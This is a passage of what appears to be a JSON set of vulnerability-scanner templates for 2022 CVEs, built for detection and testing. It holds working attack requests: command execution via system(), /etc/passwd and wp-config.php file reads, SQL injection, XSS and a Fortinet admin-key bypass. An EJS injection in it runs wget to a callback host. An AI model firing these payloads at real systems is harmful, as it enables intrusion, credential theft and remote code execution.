Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection","severity":"critical"},"requests":[{"raw":["POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"version","part":"body_2","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>confirm(document.domain)</script>","updraftplus"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 